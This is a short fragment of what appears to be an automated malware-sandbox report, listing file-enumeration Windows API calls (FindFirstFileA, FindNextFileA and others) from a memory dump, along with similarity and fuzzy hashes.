                              • Part of subcall function 00E54B60: FindFirstFileA.KERNEL32(?,?), ref: 00E54B93
                              • Part of subcall function 00E54B60: StrCmpCA.SHLWAPI(?,00E60FC4), ref: 00E54BC1
                              • Part of subcall function 00E54B60: StrCmpCA.SHLWAPI(?,00E60FC8), ref: 00E54BD7
                              • Part of subcall function 00E54B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00E54DCD
                              • Part of subcall function 00E54B60: FindClose.KERNEL32(000000FF), ref: 00E54DE2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Similarity
                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                            • String ID:
                            • API String ID: 2667927680-0
                            • Opcode ID: 040061921b29f40887a78939ac276bd7b30f2091c8743623d8f13bcffc36cae9
                            • Instruction ID: 0be356532d3507eeea914c6ec1c7d99e5866347d018be98a2a3f8ecd69f373b9
                            • Opcode Fuzzy Hash: 040061921b29f40887a78939ac276bd7b30f2091c8743623d8f13bcffc36cae9
                            • Instruction Fuzzy Hash: 792131B6940208A7CB68FBB0ED52EEDB37C9B54301F0045A4F556721C5EEB496CCCB92